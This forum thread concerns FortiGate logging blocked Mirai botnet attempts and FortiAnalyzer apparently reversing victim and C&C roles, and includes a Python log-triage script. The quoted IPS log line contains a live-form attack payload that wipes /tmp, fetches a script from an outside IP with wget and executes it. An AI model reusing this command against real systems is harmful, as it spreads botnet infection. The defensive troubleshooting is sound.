From time to time our FortiGate is logging botnet activity. When I look at the lines in our syslog server the traffic is listed as incoming from external hosts into our servers in DMZ. The lines show attempts to install and execute a script in e.g. /tmp, and shortly after the same external host tries to contact the same DMZ server through port 80. The log lines might look something like this:
2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 time=21:52:04 devname="??????" devid="FGT2KETBXXXXXXXX" logid="0419016384" type="utm" subtype="ips" eventtype="signature" level="alert" vd="root" eventtime=1627933925055431525 tz="+0200" severity="high" srcip=64.17.27.51 srccountry="United States"dstip=10.10.91.89 srcintf="Ytre-aggr" srcintfrole="wan" dstintf="DMZ-1-2" dstintfrole="undefined" sessionid=2238099031 action="dropped" proto=6 service="HTTP" policyid=237 attack="Mirai.Botnet" srcport=37935 dstport=80 hostname="127.0.0.1" url="/shell?cd+/tmp;rm+-rf+*;wget+ 209.141.41.11/jaws;sh+/tmp/jaws" direction="outgoing" attackid=43191 profile="protect_http_server" ref="http://www.fortinet.com/ids/VID43191" incidentserialno=721445630 msg="backdoor: Mirai.Botnet," crscore=30 craction=8192 crlevel="high"
My interpretation of this is an attempt to infect our server – in other words we are the victim, and the external host is the attacker.
Our FortiGate is logging to a FortiAnalyzer at the same time as the syslog server, and after running the log through FortiAnalyzer this is reported the other way around. The external hosts are listed as “Victims” and our servers as “C&C”.
Why is FortiAnalyzer turning this around, and why is it written direction="outgoing" in the log line? Perhaps I have misunderstood the concept, and our servers are indeed infected?
In addition to this, all botnet activity is being dropped by the firewall, so it really never reaches our DMZ server. Why is that not shown in the report?
Regards
bhb1958
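An added example, not part of the original post and not Fortinet code: a Python triage check that parses the log line quoted above and classifies the event from srcip, dstip and action rather than from the direction label. It assumes internal hosts use private (RFC 1918) addresses, that srcip is the side that sent the offending request, and that only action="dropped" means blocked; the verdict names are made up for the example.

```python
import ipaddress
import re

# Trimmed copy of the log line quoted in the post (same values, including the
# missing space between srccountry="United States" and dstip=).
SAMPLE = (
    '2021-08-02T21:52:06.158389+02:00 10.1.255.242 date=2021-08-02 '
    'type="utm" subtype="ips" srcip=64.17.27.51 '
    'srccountry="United States"dstip=10.10.91.89 srcintfrole="wan" '
    'dstintf="DMZ-1-2" action="dropped" service="HTTP" '
    'attack="Mirai.Botnet" srcport=37935 dstport=80 direction="outgoing"'
)

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# Assumption: only the action value seen in the post counts as blocked;
# extend this set with the values your own devices emit.
BLOCKED_ACTIONS = {"dropped"}


def parse_fields(line):
    """Return the key=value pairs of one log line, with quotes stripped."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD.finditer(line)}


def is_internal(ip):
    # Assumption: internal hosts use private (RFC 1918) addresses.
    return ipaddress.ip_address(ip).is_private


def triage(line):
    """Classify an IPS event from srcip/dstip and action, ignoring 'direction'."""
    f = parse_fields(line)
    # Assumption: srcip is the side that sent the offending request.
    src_in, dst_in = is_internal(f["srcip"]), is_internal(f["dstip"])
    blocked = f.get("action") in BLOCKED_ACTIONS
    if src_in and not dst_in:
        initiator, verdict = "internal", "internal_host_initiated"
    elif dst_in and not src_in:
        initiator = "external"
        verdict = "inbound_attempt_blocked" if blocked else "inbound_attempt_passed"
    else:
        initiator, verdict = "ambiguous", "needs_manual_review"
    return {"attack": f.get("attack"), "initiator": initiator,
            "target": f["dstip"], "blocked": blocked,
            "reported_direction": f.get("direction"), "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run over the syslog copy of the events, this gives a per-line view that can be compared against the victim and C&C labels in a report.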
We currently have a customer seeing similar logs with the victim being an external IP.
Hey david,
sorry to hear of your issues.
Can you let me know the firmware version of your FortiGate(s)? There was a known issue a while back about FortiGate logging the attack direction incorrectly, which could lead to FortiAnalyzer interpreting source and destination (and thus victim and C&C server) incorrectly.
Hey Debbie,
I confirm the same behavior with our customers in C&C Botnet detection through different versions of FortiOS and FAZ.
FGT version 6.4.9, 7.0.6, 7.2.1
FAZ version 7.0.4, 7.2.1
Jirka
Hey Jirka,
those are fairly recent firmware versions, so they should not be affected by the issue I mentioned, at least to my knowledge.
I would suggest a ticket with FortiGate and/or FortiAnalyzer team regarding this:
-> FortiGate likely reports the attack direction incorrectly
-> this causes FortiAnalyzer to report victim and C&C server incorrectly
The underlying issue is on FortiGate side, but FortiAnalyzer team does usually deal with at least some logging-related stuff on FortiGate side, so I'm not entirely sure which team would be the better fit.
A detailed explanation (with FortiAnalyzer report, raw log messages, FortiGate config and network overview showing that the supposed C&C servers are actually internal servers and the victims) in the ticket would help the assigned engineers figure out who can best assist you in resolving this.
This is an 1801F running 6.4.10, so again a recent version.
The FAZVM is running v7.0.3-build0245 220202
Hey david,
same as I replied to Jirka - I would suggest a ticket with Technical Support to dig further into it.